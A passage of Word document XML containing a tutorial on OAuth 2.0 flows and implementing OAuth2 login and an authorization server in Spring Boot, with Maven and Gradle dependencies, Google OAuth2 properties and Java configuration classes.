          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Requests Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The user is redirected to the authorization server (e.g., Google, Facebook) by the client application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF72950" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1961"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Grants Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: After authentication, the user approves or denies the permission request by the client app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F88BA7" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1961"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: If the user grants permission, the authorization server redirects the user back to the client application with an authorization code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351231E0" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1961"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Client Exchanges Authorization Code for Access Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The client sends the authorization code to the authorization server to exchange it for an access token and possibly a refresh token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16103EA9" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1961"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client Accesses Protected Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The client can now use the access token to access the user's protected resources on the resource server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08409C89" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1961"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token Expiration and Refresh</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Once the access token expires, the client can use the refresh token to obtain a new access token without involving the user again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1DDA8" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of OAuth Flows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75613E1C" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1962"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization Code Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Used by server-side web applications. The authorization code is exchanged for an access token and refresh token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98AE56" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1962"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implicit Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Used by client-side applications (e.g., JavaScript apps running in the browser). It skips the authorization code and directly returns the access token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3264DDF4" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1962"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password Grant Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Used by trusted applications that collect the user's username and password directly. The application uses this to obtain an access token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3A2C5" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1962"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client Credentials Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Used when the client is acting on its own behalf (not on behalf of a user). The client authenticates using its own credentials and gets access to its own resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA84432" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D09D4"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In Spring Boot, OAuth can be implemented using Spring Security, a powerful framework for authentication and authorization. Spring Security has support for OAuth2, which simplifies integration with external OAuth providers (like Google, Facebook, GitHub, etc.) and custom OAuth servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7EF7C8"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Spring Boot integrates OAuth through the spring-security-oauth2 module. Below is how OAuth can be implemented in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4B7D4" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-Step OAuth Implementation in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D29BE" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Add Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: To use OAuth2 in Spring Boot, you need to include the required dependencies in your pom.xml for Maven or build.gradle for Gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B771CE3" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C1985"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lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BA9C2"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC31ED"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lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413F84A"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lt;artifactId&gt;spring-boot-starter-oauth2-client&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28E248"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047DD53A"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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69C937"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lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77593731"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lt;artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A74870"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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1092D16C"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lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B78E2D1" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A249D0"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F67AF7"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implementation 'org.springframework.boot:spring-boot-starter-oauth2-client'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D83DBB"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implementation 'org.springframework.boot:spring-boot-starter-security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C50D44"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199ADDD8" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application Properties Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Configure your application to integrate with the OAuth provider (e.g., Google, GitHub, etc.). Add the OAuth2 details to your application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D6FC6"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Example for Google OAuth2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5E3A3"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spring.security.oauth2.client.registration.google.client-id=&lt;client-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A9C7C"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spring.security.oauth2.client.registration.google.client-secret=&lt;client-secret&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C22AB3"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spring.security.oauth2.client.registration.google.scope=profile,email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECD864"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spring.security.oauth2.client.registration.google.redirect-uri={baseUrl}/login/oauth2/code/{registrationId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936331F"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spring.security.oauth2.client.provider.google.authorization-uri=https://accounts.google.com/o/oauth2/auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53E7FA"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lastRenderedPageBreak/>
        <w:t>spring.security.oauth2.client.provider.google.token-uri=https://oauth2.googleapis.com/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7591B"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spring.security.oauth2.client.provider.google.user-info-uri=https://www.googleapis.com/oauth2/v3/userinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22413E" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Spring Security automatically configures most of the OAuth2 client settings. However, if you need custom behavior, you can configure it using a SecurityConfig class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092DB899"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F8D97"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EnableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7A2B1"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public class SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE902B1"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12192875"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protected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A31C720"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1006D"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authorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A1B5C"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antMatchers("/", "/login**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A85005"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anyRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412A11C"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and()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBB273"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oauth2Login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9A240"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loginPage("/login")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9214C3"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defaultSuccessUrl("/home", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3380CA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E0A5D1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624613FF" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Create a controller to handle OAuth login and display user details after authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A0C02"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B718F"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public class HomeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB043B4"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GetMapping("/home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422388A"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public String home(Model model, @AuthenticationPrincipal OAuth2User principal) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFF28F"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model.addAttribute("name", principal.getAttribute("name"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69050F"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return "home";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3D143"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFD5C1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A7FB7E" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run the Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F67FB53" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When the application starts, the /login endpoint will be available. If the user is not authenticated, they will be redirected to the OAuth provider for authentication (e.g., Google login).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23215DDF" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1963"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>After successful authentication, the user will be redirected back to the application, and the user’s details (like name and email) will be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521AE8C3" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth 2.0 Authorization Server in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6055E2"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You can also create your own Authorization Server using Spring Security OAuth2, but it's a more advanced configuration. Below is a simple example of setting up your own Authorization Server (if needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB9F29"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5BCA3"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EnableAuthorizationServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242A3C3"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public class AuthorizationServerConfig extends AuthorizationServerConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619154EB" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F73967C"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060E817"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public void configure(AuthorizationServerSecurityConfigurer security) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B49A6B"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security.tokenKeyAccess("permitAll()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94A919"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checkTokenAccess("isAuthenticated()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1128270F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F3168" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C73D25"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Override</w:t>
      </w:r>
    </w:p>
